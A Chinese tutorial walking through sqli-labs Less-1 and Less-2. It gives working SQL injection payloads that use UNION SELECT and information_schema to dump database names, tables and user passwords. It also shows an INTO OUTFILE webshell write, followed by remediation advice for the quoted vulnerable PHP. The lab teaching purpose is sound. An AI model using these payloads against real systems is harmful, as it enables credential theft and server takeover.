SQLi靶场

SQLi靶场 less1- less2 （详细讲解）

less 1 Error Based-String (字符类型注入)

思路分析

判断是否存在SQL注入

已知参数名为id，输入数值和‘ 单引号‘’ 双引号来判断，它是数值类型还是字符类型

首先输入 1 ，

发现能能正常显示，使用四则运算进一步测试。

输入?id=4-3 发现内容有变化，判断不是数值类型SQL，继续测试字符型输入单引号‘

‘ 在经过URL编码后显示为%27,发现页面出现报错信息。初步判断可能是字符型SQL语句输入两个’单引号查看是否能闭合语句.

页面有明显变化，报错信息消失，返回空信息，判断为字符型SQL注入，构造字符类型永真语句，继续测试。

?id=' or 1=1 --+    
1

%27 为 单引号 URL编码， %20 为 空格 URL编码

输入字符永真POC后，回显一条数据，但是并没有爆出该字段所有信息，后端应该对此做了限制。

注入攻击

知识回顾

先了解攻击需要使用的一些函数以及mysql系统表:

order by ：

在SQL语法中，用于排序，SQL注入攻击中可以用于爆破字段数量

union

在SQL语法中，用于联合查询，SQL注入攻击中可用于爆破特殊信息

database()

用于返回当前正在使用的数据库的名称。

version()

用于返回当前MySQL服务器的版本号。

concat()

用于将多个字符串连接在一起。

group_concat()

将多个列连在一起

information_schema

该表为mysql的系统默认表，其中包含了关于MySQL服务器和数据库的元数据信息。这个数据库不存储用户数据，而是存储关于数据库架构、表、列、索引等信息的数据。

1. information_schema.tables：这个表存储了有关所有数据库中的表的信息，包括表名、数据库名、表的类型（如表、视图等）、表的引擎（如InnoDB、MyISAM等）、创建时间、更新时间等。
2. information_schema.columns：这个表包含了有关所有表中列（字段）的信息，包括列名、列的数据类型、是否为主键、是否允许 NULL 值等。
3. information_schema.schemata：这个表列出了所有数据库的信息，包括数据库名、默认字符集、默认排序规则等。
4. information_schema.routines：这个表包含有关存储过程和函数的信息，包括它们的名称、类型、定义等。
5. information_schema.views：这个表包含有关视图（虚拟表）的信息，包括视图名、所属数据库等。
6. information_schema.key_column_usage：这个表包含了关于表的外键的信息，包括外键名、所属表、所引用的表等。
7. information_schema.table_constraints：这个表包含了有关表的约束（如主键、唯一约束等）的信息。

使用order by爆破 SELECT语句中的字段数量

?id= ' order by 4 --+  //poc
1

报错字段数量，将数值继续向小的改

数值 改成 3，发现页面变化，并没有报错，回显一个空表单，这是因为，前段查询语句是查了一个空语句，所以返回空表，查询语句如下

SELECT * FROM tables_name WHERE id='' order by 3
1

使用union获取用户数据、当前数据库名、版本信息

以知 原始查询语句的字段数为3，使用union来构造一个POC判断我们获取的字符数是否正确。

?id=' union SELECT 1,2,3 --+
1

从中发现，回显正确，并显示我们查询了的内容，但是第一个字段好像被隐藏了，第二个、第三个字段都成功回显。

进一步爆破出用户名、当前数据库名。构造POC：

?id=' union SELECT 1,user(),database() --+
1

爆破成功，这里有一点需要注意，在闭合第一个引号的时候，内部一定不要使用真值（能真实查询到的数据），因为这里系统会把默认查询到的第一行数据，优先显示到页面，在后面的源码分析中，在仔细研究其中原理。例如下面这个例子：

我把闭合的单引号，放入了真值，直接回显了这个真值查询的数据。

爆破数据库表和列名

使用mysql的系统表information_schema来波破改数据库中已存的表名和列名。

?id=' UNION select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
1

这个POC ，主要是从 information_schema.tables 表中选择了 security 数据库中的表名，并使用 GROUP_CONCAT 将它们连接成一个字符串。

然而我们可以继续对这个POC进行改造，

?id='union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
1

这个POC，就获取了information_schema.colunms中所有的table_name为users的所有字段

根据这个POC返回的信息，在进一步的构造POC，就能拿到敏感数据，

?id=' UNION SELECT 1,group_concat(username,ID,password),3 from users--+
1

这样就已经完成了一次成功的SQL注入，并获取了敏感信息。

思路总结

在学习SQL注入时，要对SQL的语法有大致上的了解，并且越熟练越好，在进行注入前要仔细分析，它使用的什么类型的SQL语句，以便对症下药，确定类型后，如果是查询类的注入，还要去分析出源语句中，使用了几个字段，当掌握这些信息后，就开始考虑如何闭合语句。基本流程如下：

1. 判断SQL语句类型
2. 构造永真POC判断是否存在SQL注入
3. 爆破源语句字段数量
4. 爆破成功后即可进行攻击

源码分析

include("../sql-connections/sql-connect.php");
//包含上级目录的用于数据链接的php代码
error_reporting(0);
//这行代码关闭了PHP错误报告，这意味着即使代码中有错误，也不会在网页上显示错误消息。

if(isset($_GET['id']))
// 判断是否获取到GET的参数，接收到参数执行以下语句，未接收到执行报错
{
$id=$_GET['id'];
//将GET传递的参数赋值给$id
$fp=fopen('result.txt','a');
//打开一个文件result.txt以用于记录。 'a' 参数表示以追加模式打开文件，如果文件不存在，将创建一个新文件。
fwrite($fp,'ID:'.$id."\n");
// 向$fp文件内写入数据，ID 和$id的字符串拼接    
fclose($fp);
// 释放文件资源




$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
//创建一个字符串变量，存储一条SQL查询语句，并把 $id 作为参数传入到语句的WHERE参数中
$result=mysql_query($sql);
//使用 $result 来接收 mysql_query($sql)函数查询的结果
$row = mysql_fetch_array($result);
// $row是一个数组变量，它使用mysql_fetch_array()来取出SQL查询结果的每一行数据

	if($row)
    //判断$row 中是否有数据，有数据则执行以下语句，没数据则执行sql报错信息
	{
  	echo "";
    //CSS样式
  	echo 'Your Login name:'. $row['username'];
    //$row数组中的 username 值
  	echo "
";
    //换行
  	echo 'Your Password:' .$row['password'];
    //$row数组中 password 值
  	echo "";
    // css样式结束标记
  	}
	else 
	{
	echo '';
	print_r(mysql_error());
	echo "";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

分析该源码我发现以下问题：

1. 在第7行使用GET方法传入的参数没有任何验证。

   • 解决办法 :对用户输出数据进行验证，并转变为需要处理的类型

   • if (isset($_GET['id']) && is_numeric($_GET['id'])) {
         //判断GET方法传入的参数是否是正确的类型
       $id = (int)$_GET['id'];
       // 确定为正确的类型在后端继续对该值再度进行转换操作
     } else {
       echo "请输入一个正确的数值.";
     }
     1
     2
     3
     4
     5
     6
     7

2. 在46行，使用了mysql_error() 来回显SQL的报错信息。

   • 解决办法：sql的报错信息不能暴露，应该保存在后台,前端的报错应该由管理员自己定义。

   • else {
       echo "发生错误。请稍后重试。";
       error_log(mysql_error()); // 记录错误信息到日志文件
     }
     1
     2
     3
     4

这里是我的才疏学浅，只能加了简单验证，但是这个验证逻辑是越复杂越好，根据实际情况去编写即可。

在之前说的在本关卡中，每次只能显示一行的数据，这是因为mysql_fetch_array()这个函数， 函数的作用是从结果集中获取一行数据，并将该数据存储在数组中，因此每次调用它都会获取一行数据。这是为了逐行处理查询结果。如果要在前段显示全部内容，就一定要在加上一个循环去打印渲染每一条语句。

less 2 Error based - Intiger based (数值类型注入)

思路分析

判断SQL类型

一、输入数值1和四则运算判断它是不是数值类型：

输入1页面由变化，回显id=1的数据。

输入数值四则运算4-3，查看返回结果，回显结果无变化，由此判断为数值类型SQL语句，

二、使用永真POC，进行判断是否存在SQL注入。

?id=-1 or 1=1
1

输入语句后，页面没变化，无报错，该字段的值也没有全部爆出，判断大概率使用了mysql_fetch_array()函数。

OR逻辑运算符的优先级是最低的，AND逻辑运算符优先级比OR高，而NOT的逻辑运算符的优先级是最高的。

在SQL语句中 OR运算符有一个特性，当第一个条件为真时，第二个条件默认不在执行。

这是因为在这种情况下，整个 OR 表达式已经被确定为真，无论第二个条件的值如何，都不会改变整个表达式的结果。这种短路逻辑有助于提高查询性能，因为不必评估多余的条件。

三、使用ORDER BY 判断源语句字段数量

?id=-1 ORDER BY 4 #
1

ORDER BY 的值是4 报错了，源语句中的字段数量要少于4

当数值是3，因为这是一条正常的语句 所以回显了id=1的数据，这代表这 SQL语句是正确的，源语句的字段数应该就是3个。

?id=1 ORDER BY 3 #
1

四、使用UNION 确定字段数量

?id=-1 UNION SELECT 1,2,3 --+
1

在这一步需要将id的值设为假，以便测试，每个字段存在的位置。

确定无问题，准备注入攻击。

注入攻击

一、获取用户名user()、数据库名database()

?id=-1 UNION SELECT 1,user(),database() --+
1

二、使用Mysqlinformation_schema库，获取更多信息

获取数据库中的所有表名：

?id=-1 UNION SELECT 1,group_concat(table_name),database() FROM information_schema.tables WHERE table_schema=database() --+
1

在此处，我们使用database()替代了security,因为database()返回的值就是它。在SQL语句 函数的执行优先级高于其他语句，而且可以用于动态地获取一些信息。

获取users中的所有字段名字：

?id=-1 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns WHERE table_name = 'users' --+
1

从username、password中获取敏感信息

?id=-1 UNION SELECT 1,group_concat(username,id,password),version() from users --+
1

POC中 group_concat()函数中只用于隔断username和password,使得账号和密码显示的更为清楚。

成功爆破，所有账号密码。

向数据库中注入webshell

?id=-1 UNION SELECT 1,'',3 into outfile './web.php' --+
1

这个注入是有条件的，mysql数据库必须开启secure_file_priv,否则就会报错。

secure_file_priv 是 MySQL 数据库服务器的配置选项之一，用于指定允许加载文件的安全目录。这个选项的目的是增强 MySQL 服务器的安全性，以限制用户在服务器上加载文件的位置，以防止潜在的安全风险。

具体来说，secure_file_priv 选项定义了一个目录路径，MySQL 服务器只允许用户在这个指定的目录或其子目录下加载文件。这意味着用户不能在不被允许的目录中执行文件加载操作。这有助于防止恶意用户滥用文件加载功能，执行危险的操作或访问敏感文件。

修改 my.cnf 文件，在 [mysqld] 块下，如果没有 secure_file_priv 则新增

指定目录：secure_file_priv=/path/to/data

不限目录：secure_file_priv=

禁止操作：secure_file_priv=NULL

测试需求，我们直接添加一个不限制目录的配置继续测试。

开启secure_file_priv后重启数据库，继续测试

发现页面错误消失了，由于我们并没有查询任何内容，所以返回空表，在测试我们的webshell有没有成功上传！

./代表本级目录，而在这里则表示上传到mysql的本级目录，它不在sqli靶场的目录，又因为跨源的问题，也没有文件包含漏洞，我们不能直接利用

再次为了演示，就直接在注入一个webshell到sqli靶场目录中 进行测试。

?id=-1 UNION SELECT 1,'',3 into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php' --+
1

这里还要强调以下，在MySQL中，单独以个\都被会认为是一个转义字符，所以我们要对这个\ 在做一次转义 ，在加上一个\就ok了

在MySQL中，INTO OUTFILE 是用于将查询结果写入文件的操作。它是在SELECT语句中使用的一种扩展。

这是操作的一般执行顺序：

1. SELECT：首先，执行SELECT语句以获取结果集。
2. INTO OUTFILE：然后，将结果集中的数据写入指定的文件，使用INTO OUTFILE子句。这个子句告诉MySQL将查询结果写入到一个文件中，该文件由路径和文件名指定。

SELECT 1,'',3 INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php'
1

这个查询选择了三个值（1、‘’、3）并将它们写入了 'D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\web.php' 这个文件中。

思路总结

在这一关总体思路与第一关基本一致，只不过在本关中使用的是数值内省SQL语句，在闭合语句方面不用考虑引号等关系。

介绍了mysql的一个安全配置项secure_file_priv，它是用来控制文件加载目的选项，在没有特殊要求的情况下，建议关闭该功能。

源码分析

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);


// connectivity 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "";
  	echo 'Your Login name:'. $row['username'];
  	echo "
";
  	echo 'Your Password:' .$row['password'];
  	echo "";
  	}
	else 
	{
	echo '';
	print_r(mysql_error());
	echo "";  
	}
}
	else
		{ 	
		echo "Please input the ID as parameter with numeric value";
		}

?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

本关的源码与第一关基本一致，唯一不同的点就是在 SQL语句中没有给变量$id引号。思路会院借鉴第一关的思路。